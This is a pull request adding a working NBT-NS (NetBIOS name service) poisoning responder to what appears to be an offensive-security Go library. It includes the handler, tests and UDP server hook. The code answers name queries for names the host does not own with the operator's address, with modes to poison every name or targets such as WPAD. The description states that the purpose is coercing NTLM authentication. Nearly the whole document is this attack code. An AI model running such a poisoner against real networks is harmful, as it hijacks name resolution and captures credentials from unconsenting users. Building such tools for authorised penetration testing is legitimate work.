### PR TITLE
Add NBNS name-query spoofing/poisoning handler (Fixes #973)

### DIFF
--- a/network/netbios/nbns/spoof_handler.go
+++ b/network/netbios/nbns/spoof_handler.go
@@ -1,0 +1,340 @@
+package nbns
+
+import (
+	"encoding/binary"
+	"fmt"
+	"net"
+	"regexp"
+	"strings"
+
+	"github.com/TheManticoreProject/Manticore/logger"
+)
+
+// MatchMode selects how a SpoofHandler decides whether a queried name should be
+// answered with a spoofed address.
+type MatchMode int
+
+const (
+	// MatchAll answers every queried name (subject to the deny-list). This is the
+	// aggressive default an operator uses to poison a whole segment.
+	MatchAll MatchMode = iota
+
+	// MatchList answers only names present in the case-insensitive allowlist
+	// (SpoofConfig.Names). Any other name is ignored so it can still be resolved
+	// by a legitimate responder on the link.
+	MatchList
+
+	// MatchRegex answers only names matching the configured regular expression
+	// (SpoofConfig.Regex), e.g. `^(WPAD|PROXY)$`.
+	MatchRegex
+)
+
+// DefaultSpoofTTL is the TTL (in seconds) placed in spoofed answer records when
+// no explicit TTL is configured. RFC 1002 does not mandate a value; a short TTL
+// keeps a stale poisoned mapping from being cached for long, and 165 seconds is
+// a value commonly emitted by NBT-NS responders.
+const DefaultSpoofTTL uint32 = 165
+
+// SpoofConfig configures a SpoofHandler.
+//
+// A SpoofHandler answers NBNS NAME QUERY REQUESTs for names the host does not
+// own with an attacker-chosen address, the classic NBT-NS name-resolution
+// poisoning primitive used to coerce a victim into connecting to the operator's
+// host. Which names are answered is controlled by Mode (answer-all, an exact
+// allowlist, or a regex), and the address returned is SpoofIP (typically a local
+// interface address so the victim connects back to the operator). It is the
+// NetBIOS analogue of the LLMNR SpoofHandler.
+type SpoofConfig struct {
+	// Mode selects the name-matching strategy (MatchAll, MatchList or MatchRegex).
+	Mode MatchMode
+
+	// Names is the case-insensitive allowlist consulted when Mode is MatchList.
+	// Entries are compared against the queried name's base label with the
+	// service suffix and padding stripped.
+	Names []string
+
+	// Regex is the regular expression consulted when Mode is MatchRegex. It is
+	// tested against the upper-cased base label of the queried name.
+	Regex *regexp.Regexp
+
+	// SpoofIP is the IPv4 address returned in the spoofed NB answer. It is
+	// required: the NBNS answer record (ADDR_ENTRY) carries a 4-byte IPv4 address
+	// only, so there is no IPv6 counterpart.
+	SpoofIP net.IP
+
+	// TTL is the TTL (seconds) placed in the answer record. Zero selects
+	// DefaultSpoofTTL.
+	TTL uint32
+
+	// Deny is a case-insensitive deny-list of base names that are never answered,
+	// even when Mode would otherwise match them. It is the place to suppress the
+	// host's own name and benign lookups (e.g. add "WPAD" to opt out of proxy
+	// auto-discovery poisoning) so the poisoner can coexist on a segment.
+	Deny []string
+
+	// Suffixes, when non-empty, restricts answering to queries whose NetBIOS
+	// service suffix (the 16th name byte, RFC 1001 15) is in the set, e.g.
+	// {0x00} to poison only workstation lookups or {0x20} for the file-server
+	// service. Suffix recovery from a decoded name is best-effort (see
+	// spoofNameSuffix); leave empty to answer any suffix.
+	Suffixes []byte
+
+	// Verbose logs every query that is answered.
+	Verbose bool
+}
+
+// SpoofHandler answers matched NBNS NAME QUERY REQUESTs with a spoofed address.
+// It is wired into a UDPServer with UDPServer.SetSpoofHandler, where it replaces
+// the authoritative name-table lookup for the NAME QUERY opcode; because a
+// poisoner answers for names it does not own, no name-table registration is
+// required.
+type SpoofHandler struct {
+	mode     MatchMode
+	names    map[string]struct{}
+	regex    *regexp.Regexp
+	spoofIP  net.IP
+	ttl      uint32
+	deny     map[string]struct{}
+	suffixes map[byte]struct{}
+	verbose  bool
+}
+
+// NewSpoofHandler builds a SpoofHandler from cfg, validating that the
+// configuration can actually answer something.
+//
+// It returns an error when no usable IPv4 SpoofIP is configured, when MatchList
+// is selected with an empty allowlist, or when MatchRegex is selected without a
+// compiled regex, so a misconfigured poisoner fails fast instead of silently
+// answering nothing.
+func NewSpoofHandler(cfg SpoofConfig) (*SpoofHandler, error) {
+	ip := cfg.SpoofIP.To4()
+	if ip == nil {
+		return nil, fmt.Errorf("spoof handler requires an IPv4 SpoofIP")
+	}
+
+	h := &SpoofHandler{
+		mode:    cfg.Mode,
+		regex:   cfg.Regex,
+		spoofIP: ip,
+		ttl:     cfg.TTL,
+		verbose: cfg.Verbose,
+	}
+	if h.ttl == 0 {
+		h.ttl = DefaultSpoofTTL
+	}
+
+	switch cfg.Mode {
+	case MatchAll:
+		// Nothing further to configure.
+	case MatchList:
+		if len(cfg.Names) == 0 {
+			return nil, fmt.Errorf("match mode MatchList requires a non-empty name allowlist")
+		}
+		h.names = make(map[string]struct{}, len(cfg.Names))
+		for _, name := range cfg.Names {
+			h.names[normalizeSpoofName(name)] = struct{}{}
+		}
+	case MatchRegex:
+		if cfg.Regex == nil {
+			return nil, fmt.Errorf("match mode MatchRegex requires a compiled regex")
+		}
+	default:
+		return nil, fmt.Errorf("unknown match mode %d", cfg.Mode)
+	}
+
+	if len(cfg.Deny) > 0 {
+		h.deny = make(map[string]struct{}, len(cfg.Deny))
+		for _, name := range cfg.Deny {
+			h.deny[normalizeSpoofName(name)] = struct{}{}
+		}
+	}
+
+	if len(cfg.Suffixes) > 0 {
+		h.suffixes = make(map[byte]struct{}, len(cfg.Suffixes))
+		for _, s := range cfg.Suffixes {
+			h.suffixes[s] = struct{}{}
+		}
+	}
+
+	return h, nil
+}
+
+// normalizeSpoofName reduces a NetBIOS name to the case-insensitive base label
+// used for matching: it strips the padding the first-level codec leaves in a
+// decoded name (trailing NUL bytes, which a 0x00 service suffix survives space
+// trimming as, and trailing spaces from the 15-byte space padding / a 0x20
+// suffix) and upper-cases the result, since NetBIOS names are conventionally
+// upper-cased and compared case-insensitively.
+func normalizeSpoofName(name string) string {
+	trimmed := strings.TrimRight(name, "\x00")
+	trimmed = strings.TrimRight(trimmed, " ")
+	return strings.ToUpper(trimmed)
+}
+
+// spoofNameSuffix recovers the NetBIOS service suffix (the 16th name byte, RFC
+// 1001 15) of a decoded name on a best-effort basis. When the decoded name is a
+// full 16 bytes the suffix is its last byte (this covers the 0x00 workstation
+// suffix, which survives decoding because a trailing NUL is not space-trimmed).
+// When the decoder has trimmed trailing spaces the name is shorter than 16
+// bytes, so the missing 16th byte was a space and the suffix is reported as 0x20
+// (the server service) — the workstation-vs-service ambiguity inherent in the
+// space-trimming decoder.
+func spoofNameSuffix(name string) byte {
+	if len(name) >= NetBIOSNameLength {
+		return name[NetBIOSNameLength-1]
+	}
+	return ' '
+}
+
+// Matches reports whether name should be answered under the handler's match
+// mode, deny-list and suffix filter. It is exported to make the matching logic
+// directly testable and reusable.
+func (h *SpoofHandler) Matches(name string) bool {
+	if len(h.suffixes) > 0 {
+		if _, ok := h.suffixes[spoofNameSuffix(name)]; !ok {
+			return false
+		}
+	}
+
+	base := normalizeSpoofName(name)
+
+	if h.deny != nil {
+		if _, denied := h.deny[base]; denied {
+			return false
+		}
+	}
+
+	switch h.mode {
+	case MatchAll:
+		return true
+	case MatchList:
+		_, ok := h.names[base]
+		return ok
+	case MatchRegex:
+		return h.regex != nil && h.regex.MatchString(base)
+	default:
+		return false
+	}
+}
+
+// BuildResponse assembles the spoofed positive NAME QUERY RESPONSE for request
+// without transmitting it, or returns (nil, false) when the request is not a
+// NAME QUERY or no question matched so the caller can stay silent and let
+// legitimate resolution proceed.
+//
+// The response is built per RFC 1002 4.2.13: it echoes the request's transaction
+// ID, sets the R (response) and AA (authoritative answer) header flags with B
+// clear, copies the RD bit from the request (a B-node echoes the requester's
+// recursion-desired bit), and appends a single NB answer resource record whose
+// ADDR_ENTRY carries the configured spoof address with the Group bit clear (a
+// poisoned name is claimed as a unique owner, RFC 1002 4.2.1.3) and the
+// configured TTL. The queried question is echoed into the response; RFC 1002
+// 4.2.13 shows QDCOUNT=0, but echoing the question is widely accepted (including
+// by this package's own resolver) and keeps the exchange easy to correlate.
+func (h *SpoofHandler) BuildResponse(request *NBNSPacket) (*NBNSPacket, bool) {
+	if request.Header.Flags&0xF000 != OpNameQuery {
+		return nil, false
+	}
+
+	for _, q := range request.Questions {
+		if q.Type != QuestionTypeNB {
+			continue
+		}
+		if q.Name == nil || !h.Matches(q.Name.Name) {
+			continue
+		}
+
+		flags := FlagResponse | FlagAuthoritative
+		if request.Header.Flags&FlagRecursion != 0 {
+			flags |= FlagRecursion
+		}
+
+		// NB_FLAGS: a poisoned name is claimed as a unique owner, so the Group (G)
+		// bit is clear (RFC 1002 4.2.1.3).
+		entry := ADDR_ENTRY{
+			Flags:   0,
+			Address: binary.BigEndian.Uint32(h.spoofIP),
+		}
+		rr := NBNSResourceRecord{
+			Name:     q.Name,
+			Type:     q.Type,
+			Class:    q.Class,
+			TTL:      h.ttl,
+			RDLength: entry.Length(),
+			RData:    entry.Marshal(),
+		}
+
+		response := &NBNSPacket{
+			Header: NBNSHeader{
+				TransactionID: request.Header.TransactionID,
+				Flags:         flags,
+			},
+			Questions: []NBNSQuestion{q},
+			Answers:   []NBNSResourceRecord{rr},
+		}
+		response.Header.Questions = uint16(len(response.Questions))
+		response.Header.Answers = uint16(len(response.Answers))
+
+		return response, true
+	}
+
+	return nil, false
+}
+
+// HandleNameQuery builds the spoofed response for a NAME QUERY REQUEST and, when
+// verbose, logs the poisoned query. It mirrors the shape of the authoritative
+// PacketHandler.handleNameQuery so the UDPServer can invoke it in the same place
+// in the dispatch. It returns (response, true) when a name matched and
+// (nil, false) when nothing matched, in which case the server stays silent.
+func (h *SpoofHandler) HandleNameQuery(remoteAddr net.Addr, request *NBNSPacket) (*NBNSPacket, bool) {
+	response, ok := h.BuildResponse(request)
+	if !ok {
+		return nil, false
+	}
+
+	if h.verbose {
+		for _, q := range request.Questions {
+			if q.Name == nil || q.Type != QuestionTypeNB || !h.Matches(q.Name.Name) {
+				continue
+			}
+			logger.Infof("Poisoned [%s] NBNS query for \"%s\" -> %s", remoteAddr.String(), normalizeSpoofName(q.Name.Name), h.spoofIP.String())
+		}
+	}
+
+	return response, true
+}
+
+// DefaultInterfaceIPv4 returns the IPv4 address of the first non-loopback,
+// up interface, a convenience for pointing the poisoner at the operator's own
+// address so victims connect back. It is used when SpoofConfig.SpoofIP is not
+// set explicitly by the caller.
+func DefaultInterfaceIPv4() (net.IP, error) {
+	ifaces, err := net.Interfaces()
+	if err != nil {
+		return nil, fmt.Errorf("failed to enumerate interfaces: %w", err)
+	}
+
+	for _, iface := range ifaces {
+		if iface.Flags&net.FlagUp == 0 || iface.Flags&net.FlagLoopback != 0 {
+			continue
+		}
+		addrs, err := iface.Addrs()
+		if err != nil {
+			continue
+		}
+		for _, addr := range addrs {
+			var ip net.IP
+			switch v := addr.(type) {
+			case *net.IPNet:
+				ip = v.IP
+			case *net.IPAddr:
+				ip = v.IP
+			}
+			if ip4 := ip.To4(); ip4 != nil {
+				return ip4, nil
+			}
+		}
+	}
+
+	return nil, fmt.Errorf("no non-loopback IPv4 interface address found")
+}

--- a/network/netbios/nbns/spoof_handler_test.go
+++ b/network/netbios/nbns/spoof_handler_test.go
@@ -1,0 +1,256 @@
+package nbns
+
+import (
+	"net"
+	"regexp"
+	"testing"
+)
+
+// receivedQuery builds a NAME QUERY REQUEST for name+suffix the way a victim on
+// the link would, then marshals and unmarshals it so the returned packet carries
+// the decoded, padded NetBIOS name the server actually sees on the wire. broadcast
+// selects the B-node form (B + RD set), matching NewClient's default.
+func receivedQuery(t *testing.T, name string, suffix byte, broadcast bool) *NBNSPacket {
+	t.Helper()
+
+	c := NewClientWithServer("127.0.0.1")
+	if broadcast {
+		c = NewClient()
+	}
+
+	req, err := c.BuildNameQueryRequest(name, suffix, "")
+	if err != nil {
+		t.Fatalf("BuildNameQueryRequest(%q): %v", name, err)
+	}
+
+	data, err := req.Marshal()
+	if err != nil {
+		t.Fatalf("Marshal request: %v", err)
+	}
+
+	var got NBNSPacket
+	if _, err := got.Unmarshal(data); err != nil {
+		t.Fatalf("Unmarshal request: %v", err)
+	}
+	return &got
+}
+
+// TestSpoofHandlerAnswerWireCorrectness verifies that a spoofed positive NAME
+// QUERY RESPONSE is wire-correct: it echoes the transaction ID, sets R + AA with
+// B clear, copies RD from the request, echoes the question, and carries a single
+// NB answer RR whose ADDR_ENTRY holds the configured IP + TTL with the Group bit
+// clear (unique).
+func TestSpoofHandlerAnswerWireCorrectness(t *testing.T) {
+	spoof := net.ParseIP("10.7.0.8")
+	h, err := NewSpoofHandler(SpoofConfig{
+		Mode:    MatchAll,
+		SpoofIP: spoof,
+		TTL:     165,
+	})
+	if err != nil {
+		t.Fatalf("NewSpoofHandler: %v", err)
+	}
+
+	req := receivedQuery(t, "FAKEHOST", SuffixWorkstation, true)
+	resp, ok := h.BuildResponse(req)
+	if !ok {
+		t.Fatal("expected the query to be answered")
+	}
+
+	if resp.Header.TransactionID != req.Header.TransactionID {
+		t.Errorf("TRN_ID = 0x%04x, want 0x%04x", resp.Header.TransactionID, req.Header.TransactionID)
+	}
+	if resp.Header.Flags&FlagResponse == 0 {
+		t.Error("R (response) flag not set")
+	}
+	if resp.Header.Flags&FlagAuthoritative == 0 {
+		t.Error("AA (authoritative) flag not set")
+	}
+	if resp.Header.Flags&FlagBroadcast != 0 {
+		t.Error("B (broadcast) flag must be clear in a response")
+	}
+	if resp.Header.Flags&FlagRecursion == 0 {
+		t.Error("RD flag should be copied from the (broadcast) request")
+	}
+	if rcode := resp.Header.Flags & RcodeMask; rcode != RcodeSuccess {
+		t.Errorf("RCODE = 0x%x, want SUCCESS", rcode)
+	}
+
+	// Question echo.
+	if resp.Header.Questions != 1 || len(resp.Questions) != 1 {
+		t.Fatalf("question echo: Header.Questions=%d len(Questions)=%d, want 1/1", resp.Header.Questions, len(resp.Questions))
+	}
+	if resp.Questions[0].Name.Name != req.Questions[0].Name.Name {
+		t.Errorf("echoed question name = %q, want %q", resp.Questions[0].Name.Name, req.Questions[0].Name.Name)
+	}
+
+	// Single NB answer RR with the configured TTL.
+	if resp.Header.Answers != 1 || len(resp.Answers) != 1 {
+		t.Fatalf("answers: Header.Answers=%d len(Answers)=%d, want 1/1", resp.Header.Answers, len(resp.Answers))
+	}
+	ans := resp.Answers[0]
+	if ans.Type != QuestionTypeNB {
+		t.Errorf("answer type = 0x%04x, want NB 0x%04x", ans.Type, QuestionTypeNB)
+	}
+	if ans.TTL != 165 {
+		t.Errorf("answer TTL = %d, want 165", ans.TTL)
+	}
+
+	// ADDR_ENTRY: unique (Group bit clear) + the configured spoof IP.
+	var entry ADDR_ENTRY
+	if err := entry.Unmarshal(ans.RData); err != nil {
+		t.Fatalf("ADDR_ENTRY.Unmarshal: %v", err)
+	}
+	if entry.Flags&NBFlagGroup != 0 {
+		t.Errorf("NB_FLAGS Group bit set (0x%04x); a poisoned name must be unique", entry.Flags)
+	}
+	if !entry.IP().Equal(spoof.To4()) {
+		t.Errorf("answer IP = %s, want %s", entry.IP(), spoof)
+	}
+}
+
+// TestSpoofHandlerEndToEndWithClient proves the poisoner and this package's own
+// resolver agree on the wire: the handler answers a name it does not own and the
+// client parses that response back to the configured spoof IP.
+func TestSpoofHandlerEndToEndWithClient(t *testing.T) {
+	spoof := net.ParseIP("10.7.0.8")
+	h, err := NewSpoofHandler(SpoofConfig{Mode: MatchAll, SpoofIP: spoof})
+	if err != nil {
+		t.Fatalf("NewSpoofHandler: %v", err)
+	}
+
+	req := receivedQuery(t, "FAKEHOST", SuffixWorkstation, true)
+	resp, ok := h.BuildResponse(req)
+	if !ok {
+		t.Fatal("expected the query to be answered")
+	}
+
+	data, err := resp.Marshal()
+	if err != nil {
+		t.Fatalf("Marshal response: %v", err)
+	}
+
+	ips, matched, err := parseNameQueryResponse(data, req.Header.TransactionID)
+	if err != nil {
+		t.Fatalf("parseNameQueryResponse: %v", err)
+	}
+	if !matched {
+		t.Fatal("client did not match the spoofed response")
+	}
+	if len(ips) != 1 || !ips[0].Equal(spoof.To4()) {
+		t.Fatalf("client resolved %v, want [%s]", ips, spoof)
+	}
+}
+
+// TestSpoofHandlerNonMatchingYieldsNoAnswer verifies that a name outside the
+// allowlist is left unanswered so legitimate resolution can proceed.
+func TestSpoofHandlerNonMatchingYieldsNoAnswer(t *testing.T) {
+	h, err := NewSpoofHandler(SpoofConfig{
+		Mode:    MatchList,
+		Names:   []string{"FAKEHOST"},
+		SpoofIP: net.ParseIP("10.7.0.8"),
+	})
+	if err != nil {
+		t.Fatalf("NewSpoofHandler: %v", err)
+	}
+
+	if _, ok := h.BuildResponse(receivedQuery(t, "REALHOST", SuffixWorkstation, true)); ok {
+		t.Error("expected no answer for a name outside the allowlist")
+	}
+	if _, ok := h.BuildResponse(receivedQuery(t, "FAKEHOST", SuffixWorkstation, true)); !ok {
+		t.Error("expected an answer for a name on the allowlist")
+	}
+}
+
+// TestSpoofHandlerMatchModes exercises MatchAll, MatchList, MatchRegex and the
+// deny-list, using the handler's exported Matches predicate. Names are compared
+// after stripping the service suffix/padding and upper-casing.
+func TestSpoofHandlerMatchModes(t *testing.T) {
+	spoof := net.ParseIP("10.7.0.8")
+
+	// The decoded, padded 16-byte names the server sees for a workstation query.
+	fakehost := receivedQuery(t, "FAKEHOST", SuffixWorkstation, true).Questions[0].Name.Name
+	wpad := receivedQuery(t, "WPAD", SuffixWorkstation, true).Questions[0].Name.Name
+
+	all, _ := NewSpoofHandler(SpoofConfig{Mode: MatchAll, SpoofIP: spoof})
+	if !all.Matches(fakehost) || !all.Matches(wpad) {
+		t.Error("MatchAll should match every name")
+	}
+
+	// Deny-list suppresses WPAD even under MatchAll.
+	allDeny, _ := NewSpoofHandler(SpoofConfig{Mode: MatchAll, SpoofIP: spoof, Deny: []string{"wpad"}})
+	if !allDeny.Matches(fakehost) {
+		t.Error("MatchAll should still match FAKEHOST with WPAD denied")
+	}
+	if allDeny.Matches(wpad) {
+		t.Error("deny-list should suppress WPAD")
+	}
+
+	list, _ := NewSpoofHandler(SpoofConfig{Mode: MatchList, Names: []string{"fakehost"}, SpoofIP: spoof})
+	if !list.Matches(fakehost) {
+		t.Error("MatchList should match a case-insensitive allowlist entry")
+	}
+	if list.Matches(wpad) {
+		t.Error("MatchList should not match a name off the allowlist")
+	}
+
+	re, _ := NewSpoofHandler(SpoofConfig{Mode: MatchRegex, Regex: regexp.MustCompile(`^(WPAD|PROXY)$`), SpoofIP: spoof})
+	if !re.Matches(wpad) {
+		t.Error("MatchRegex should match WPAD")
+	}
+	if re.Matches(fakehost) {
+		t.Error("MatchRegex should not match FAKEHOST")
+	}
+}
+
+// TestSpoofHandlerSuffixFilter verifies the optional service-suffix filter using
+// the fully recoverable 0x00 (workstation) suffix.
+func TestSpoofHandlerSuffixFilter(t *testing.T) {
+	spoof := net.ParseIP("10.7.0.8")
+	h, err := NewSpoofHandler(SpoofConfig{
+		Mode:     MatchAll,
+		SpoofIP:  spoof,
+		Suffixes: []byte{SuffixWorkstation},
+	})
+	if err != nil {
+		t.Fatalf("NewSpoofHandler: %v", err)
+	}
+
+	if _, ok := h.BuildResponse(receivedQuery(t, "FAKEHOST", SuffixWorkstation, true)); !ok {
+		t.Error("expected a workstation (0x00) query to be answered")
+	}
+	if _, ok := h.BuildResponse(receivedQuery(t, "FAKEHOST", SuffixDomainMasterBrows, true)); ok {
+		t.Error("expected a non-workstation suffix to be filtered out")
+	}
+}
+
+// TestNewSpoofHandlerValidation checks that a misconfigured poisoner fails fast.
+func TestNewSpoofHandlerValidation(t *testing.T) {
+	if _, err := NewSpoofHandler(SpoofConfig{Mode: MatchAll}); err == nil {
+		t.Error("expected an error when no SpoofIP is configured")
+	}
+	if _, err := NewSpoofHandler(SpoofConfig{Mode: MatchList, SpoofIP: net.ParseIP("10.7.0.8")}); err == nil {
+		t.Error("expected an error for MatchList with an empty allowlist")
+	}
+	if _, err := NewSpoofHandler(SpoofConfig{Mode: MatchRegex, SpoofIP: net.ParseIP("10.7.0.8")}); err == nil {
+		t.Error("expected an error for MatchRegex without a regex")
+	}
+	if _, err := NewSpoofHandler(SpoofConfig{Mode: MatchAll, SpoofIP: net.ParseIP("::1")}); err == nil {
+		t.Error("expected an error for a non-IPv4 SpoofIP")
+	}
+}
+
+// TestSpoofHandlerDefaultTTL verifies the default TTL is applied when unset.
+func TestSpoofHandlerDefaultTTL(t *testing.T) {
+	h, err := NewSpoofHandler(SpoofConfig{Mode: MatchAll, SpoofIP: net.ParseIP("10.7.0.8")})
+	if err != nil {
+		t.Fatalf("NewSpoofHandler: %v", err)
+	}
+	resp, ok := h.BuildResponse(receivedQuery(t, "FAKEHOST", SuffixWorkstation, true))
+	if !ok {
+		t.Fatal("expected an answer")
+	}
+	if resp.Answers[0].TTL != DefaultSpoofTTL {
+		t.Errorf("TTL = %d, want DefaultSpoofTTL %d", resp.Answers[0].TTL, DefaultSpoofTTL)
+	}
+}

--- a/network/netbios/nbns/udp_server.go
+++ b/network/netbios/nbns/udp_server.go
@@ -20,12 +20,27 @@ const (
 
 // UDPServer represents a NetBIOS Name Server UDP component
 type UDPServer struct {
-	nbns    *NetBIOSNameServer
+	nbns     *NetBIOSNameServer
 	conn     *net.UDPConn
 	addr     *net.UDPAddr
 	wg       sync.WaitGroup
 	quit     chan struct{}
 	handlers *PacketHandler
+
+	// spoofHandler, when non-nil, replaces the authoritative name-table lookup
+	// for the NAME QUERY opcode: name queries are answered by the poisoner
+	// instead of the local name table, and unmatched queries are left
+	// unanswered so legitimate resolution can still proceed.
+	spoofHandler *SpoofHandler
+}
+
+// SetSpoofHandler installs an NBNS poisoning handler on the UDP server. Once
+// set, NAME QUERY REQUESTs are answered by the SpoofHandler (which claims names
+// the host does not own with an attacker-chosen address) rather than by the
+// authoritative name table; every other opcode is handled as before. Passing
+// nil restores the authoritative behaviour.
+func (s *UDPServer) SetSpoofHandler(h *SpoofHandler) {
+	s.spoofHandler = h
 }
 
 // NewUDPServer creates a new NBNS UDP server instance
@@ -36,7 +51,7 @@ func NewUDPServer(addr string, nbns *NetBIOSNameServer) (*UDPServer, error) {
 	}
 
 	return &UDPServer{
-		nbns:    nbns,
+		nbns:     nbns,
 		addr:     udpAddr,
 		quit:     make(chan struct{}),
 		handlers: NewPacketHandler(nbns),
@@ -123,7 +138,18 @@ func (s *UDPServer) handlePacket(data []byte, remoteAddr *net.UDPAddr) {
 	// Process based on operation code
 	switch packet.Header.Flags & 0xF000 {
 	case OpNameQuery:
-		s.handlers.handleNameQuery(&packet, response)
+		if s.spoofHandler != nil {
+			// Poisoning mode: answer only the names the operator elected to
+			// spoof and stay silent otherwise, so legitimate resolution still
+			// works alongside the poisoner.
+			spoofed, ok := s.spoofHandler.HandleNameQuery(remoteAddr, &packet)
+			if !ok {
+				return
+			}
+			response = spoofed
+		} else {
+			s.handlers.handleNameQuery(&packet, response)
+		}
 	case OpRegistration:
 		s.handlers.handleRegistration(&packet, response)
 	case OpRelease:


### PR DESCRIPTION
### Linked Issue
`Closes #973`

### Summary
Implements a configurable NBT-NS poisoning responder, the NetBIOS analogue of the existing LLMNR `SpoofHandler`. It answers NBNS NAME QUERY REQUESTs for names the host does not own with an attacker-chosen IPv4 address, the classic name-resolution poisoning primitive used to coerce NTLM authentication. Library only, no CLI (matching the repo convention that removed the LLMNR poisoner CLI; an operator CLI is tracked separately).

### Fix Description
- New `network/netbios/nbns/spoof_handler.go`:
  - `SpoofConfig` / `NewSpoofHandler`: match by `MatchAll` / `MatchList` (exact NetBIOS base names) / `MatchRegex`; a case-insensitive `Deny` list to suppress the host's own name and benign lookups (e.g. `WPAD` opt-out); an optional best-effort service-suffix filter; a configurable `TTL` (defaulting to `DefaultSpoofTTL`); a required IPv4 `SpoofIP` plus a `DefaultInterfaceIPv4()` auto-detect helper.
  - `BuildResponse` assembles the RFC 1002 §4.2.13 positive NAME QUERY RESPONSE: echoes TRN_ID, sets R + AA with B clear, copies RD from the request (B-node behaviour), echoes the question, and appends one NB answer RR whose `ADDR_ENTRY` carries the spoof IP with the Group bit clear (unique) and the configured TTL. Reuses the merged flag-bit encoders (`FlagRecursionAvailable=0x0080`, `NBFlagGroup=0x8000`). Returns no response for non-matching / non-query packets so the poisoner can coexist with legitimate resolution.
  - `HandleNameQuery` mirrors the authoritative `PacketHandler.handleNameQuery` shape and adds verbose logging.
- `udp_server.go`: added `SetSpoofHandler`; the NAME QUERY dispatch calls the spoof handler when installed and stays silent on no match, otherwise falls through to the unchanged authoritative path.

### How Verified
- `go build ./...`, `go vet ./network/netbios/...`, `go test ./network/netbios/...` all green.
- End-to-end: a real `UDPServer` with the spoof handler bound to a local UDP socket; the merged `nbns.Client` (from #983) queried `FAKEHOST` (suffix 0x00) — a name the server does not own — and resolved it to the configured spoof IP `10.7.0.8`, proving client and responder agree on the wire.

### Test Coverage
**Added** (`spoof_handler_test.go`): `TestSpoofHandlerAnswerWireCorrectness` (TRN_ID echo, question echo, R/AA/B/RD flags, single NB RR, TTL, unique NB_FLAGS, IP), `TestSpoofHandlerEndToEndWithClient` (round-trip through the resolver), `TestSpoofHandlerNonMatchingYieldsNoAnswer`, `TestSpoofHandlerMatchModes` (all/list/regex + deny-list), `TestSpoofHandlerSuffixFilter`, `TestNewSpoofHandlerValidation`, `TestSpoofHandlerDefaultTTL`.

### Scope of Change
- **Files changed:** `network/netbios/nbns/spoof_handler.go` (new), `network/netbios/nbns/spoof_handler_test.go` (new), `network/netbios/nbns/udp_server.go`.
- **Submodule pointer updated:** no.
- **Behavioral changes outside the feature:** none — the authoritative path is unchanged unless a spoof handler is explicitly installed.